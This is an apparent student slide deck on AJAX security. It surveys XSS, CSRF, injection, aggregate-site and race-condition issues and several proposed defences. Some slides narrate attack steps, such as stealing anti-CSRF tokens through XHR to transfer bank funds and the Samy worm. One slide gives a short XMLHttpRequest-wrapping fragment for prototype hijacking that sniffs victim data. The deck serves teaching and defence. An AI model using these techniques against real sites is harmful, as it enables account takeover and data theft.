260 likes | 429 Views
AJAX Security Issues. Kim Giglia CSC 682. Asynchronous JavaScript And XML (AJAX). Not a new technology – a synergy of existing technologies JavaScript DOM (Document Object Model) XML, JSON and XSLT DHTML, XHTML, and CSS XHR (XMLHttpRequest) Object. Traditional Web Application.
E N D
AJAX Security Issues Kim Giglia CSC 682
Asynchronous JavaScript And XML (AJAX) • Not a new technology – a synergy of existing technologies • JavaScript • DOM (Document Object Model) • XML, JSON and XSLT • DHTML, XHTML, and CSS • XHR (XMLHttpRequest) Object
Security Issues – General • Ajax applications are more complex • Hard to find knowledgeable developers • More LOC and varied parts • Ajax applications are transparent • Messages between the client/server intercepted and understood (HTTP) • Application is accessible to anyone • Some application logic stored on client
XSS and CSRF • XML poisoning • Malicious Ajax Code Injection • RSS/Atom Injection • WSDL scanning and enumeration • Client Side validation routines • Web Services Routing Issues Specific Security Issues
Parameter manipulation with SOAP • XPATH injection • RIA client binary manipulation • XSS Prototype Hijacking • HTTP Request Splitting • Mashup site security problems • Aggregate or Ajax portal site problems • Race Conditions Specific Security Issues
Why do issues arise? • Tight deadlines • Limited opportunity for training • Predeveloped frameworks
Malicious Ajax Code Injection – Theoretical Attack • Hacker in a place with wireless connection • Travel Agency site – HighTechVacations.net • Agency has coupon array and crypto functions on client-side – oops! • Agency doesn’t validate all client-side input for queries and uses client-side data transformation– oops! • Agency stores both user and admin functions in a common.js file including – AjaxCalls.admin.addUser – oops! Specific Attacks Illustrated
XSS and CSRF – Theoretical Attack • Hacker in a place with wireless find bank.com with an XSS vulnerability • Hacker crafts a URL pointing to real bank.com site, but contains a JavaScript payload in the query string • Hacker e-mails link to bank.com customers and asks them to come check out new website • User follows link and logs in – Hacker now has id and password • JavaScript load now uses XHR object to request account balance Specific Attacks Illustrated
XSS and CSRF – Theoretical Attack • After account balance extracted XHR object is used to request transfer of funds • Bank requires confirmation of transfer – XHR object extracts out randomized token (nonce) and returns a confirmation – funds transfer • Remember user never sees any activity as DOM is not updated • This type of CSRF not possible before Ajax, because attacker could not extract response from XHR object – only blind attacks were possible Specific Attacks Illustrated
XSS and CSRF – Real Attack • Samy worm on myspace.com • Inserted JavaScript into his profile • Worm re-directs browser to view from www.myspace.com instead of profile.myspace.com • Uses XHR obj to retrieve and modify friendslist and user profile • Site asks for confirmation of profile update – XHR object used to extract token and confirm Specific Attacks Illustrated
XSS Prototype Hijacking • Wrapper function for XHR object • var xmlhttp = XMLHttpRequest; • XMLHttpRequest = function( ) { this.xml = new xmlhttp(); return this; } • Now attacker has access to control the xml attribute • Attacker sets up sniff() function which will be used to send the victim’s data to attacker’s site • Finally attacker wraps XHR send() function to include the sniff() function and maybe even tamper with parameters sent to real site Specific Attacks Illustrated
Aggregate Sites Specific Attacks Illustrated
Aggregate Sites • Data aggregated from multiple untrustworthy sites • Everything running in same security domain • IFrame jails can be used, but those can still be compromised by adding a new iframe inside one jail to point to another iframe outside of the jail. • NetVibes.com specifically allows widgets to make POSTs to /save/userData.php – so unless you extend iframe jails to server – no protection • Session hijacking if iframe jails can access session ID Specific Attacks Illustrated
Aggregate Sites Specific Attacks Illustrated Unencrypted Encrypted Aggregate.com Gmail.com Hacker • Aggregates are transmitting your data over unencrypted connections
Race conditions • Alice banks has direct deposit and banks online • Alice transfers $2k from savings to checking online • Simultaneously her direct deposit of $10k is occurring • Before transfer and direct deposit her checking acct bal was $2k • After both execute her checking acct bal is $4k – what?!@%&? • A race condition has occurred and only the $2k transfer updated – the web app developers failed to account for race conditions with other processes Not an attack – still a problem
General recommendations • Developer training and secure coding practices • Specifically validate all data input • Get a corporate management buy-in to foster a secure development environment Solutions to Security Issues
Specific solutions • Code migration framework to Ajax • Develop in Java – • Access to strong IDE • Developers more familiar than JavaScript • Use static/dynamic analysis to catch vulnerabilities • Use XMLVM and XSL style sheet mappings to automatically convert to JavaScript • Prototype program was developed to test feasibility • This approach cannot support multi-threaded apps Solutions to Security Issues
Specific solutions • Automatic Partitioning • Code in Jif 3.0 • Developer focused on one language • Jif code compiled into WebIL • Separates code into 2 programs – client and server according to security constraints • Compile both programs into Java • Use GWT to transform client-side into JavaScript • Six small prototype apps tested – no real world apps tested • Labels require getting used to Solutions to Security Issues
Specific solutions • Construction frameworks to protect against injection • Extension of same origin policy • Identify every UI widget as a principal • Sandbox the principal w.r. to JavaScript • Modify browser to collect list of principals as it walks DOM tree • Modify development framework to attach principal annotations when HTML generated • Problems handling UI’s dependent upon other UI’s • No testing submitted by authors Solutions to Security Issues
Specific solutions • BrowserShield • Re-write web pages to filter for malicious content • THTML • Tokenizes HTML-modifies per sec policies • Tags script elements w/ bshield.translate() • TSCRIPT • Re-writes all JavaScript at runtime per policies and feeds through Interposition Layer • Interposition Layer controls all DOM manipulations Solutions to Security Issues
Specific solutions Solutions to Security Issues
Specific solutions • BrowserShield • Authors built a prototype and tested against all critical vulnerabilities for which IE released patches in 2005 • 12 vulnerabilities related to HTML, script, and ActiveX – 100% caught by BrowserShield Solutions to Security Issues
Developing secure Ajax applications is a work in progress • Continued developer education and awareness is needed • Some changes in corporate culture may have to happen • If Ajax applications are developed willy-nilly and people are attacked – they may decide to stop using the web – this could stifle certain industries • Above all – developers should scrub data inputs Conclusions